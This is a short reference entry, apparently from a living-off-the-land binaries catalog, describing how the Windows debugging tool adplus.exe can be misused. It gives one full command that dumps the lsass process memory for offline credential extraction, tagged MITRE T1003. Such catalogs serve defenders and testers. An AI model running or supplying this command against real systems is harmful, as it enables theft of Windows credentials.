adplus.exe

Debugging tool included with Windows Debugging Tools


Paths:


Resources:
https://blog.thecybersecuritytutor.com/Exeuction-AWL-Bypass-Remote-exe-LOLBin/

Acknowledgement:
mr.d0x - @mrd0x


Detection:



Dump

Creates a memory dump of the lsass process
adplus.exe -hang -pn lsass.exe -o c:\users\mr.d0x\output\folder -quiet
Usecase: Create memory dump and parse it offline
Privileges required: SYSTEM
OS: All Windows
Mitre: T1003